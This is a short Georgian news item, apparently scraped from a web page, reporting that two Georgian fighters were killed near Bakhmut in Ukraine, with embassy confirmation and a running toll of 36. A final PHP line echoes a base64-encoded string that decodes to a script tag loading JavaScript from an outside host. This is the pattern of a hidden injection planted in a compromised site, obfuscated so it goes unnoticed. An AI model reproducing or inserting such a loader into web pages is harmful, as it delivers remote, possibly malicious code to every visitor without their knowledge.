celsiusi
ავერსი შნაიდერი
უკრაინაში, კიდევ ორი ქართველი მებრძოლი დაიღუპა. ამის შესახებ ინფორმაციას სოციალურ ქსელში უკრაინაში მყოფი მათი თანამებრძოლები ავრცელებენ.
დაღუპული მებრძოლები მიხეილ თევდორაძე და სერგო ქართველიშვილი (ლისიხი) არიან. როგორც ცნობილი ხდება, ისინი უკრაინაში, ბახმუტთან დაიღუპნენ.
ბახმუტთან საქართველოს 2 მოქალაქის გარდაცვალების ფაქტს ადასტურებს უკრაინაში საქართველოს საელჩოც და განმარტავს, რომ განხორციელდება საჭირო პროცედურები.
შეგახსენებთ, რომ უკრაინაში რუსეთის ომს 36 ქართველი მებრძოლი ემსხვერპლა.
 
 
367
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");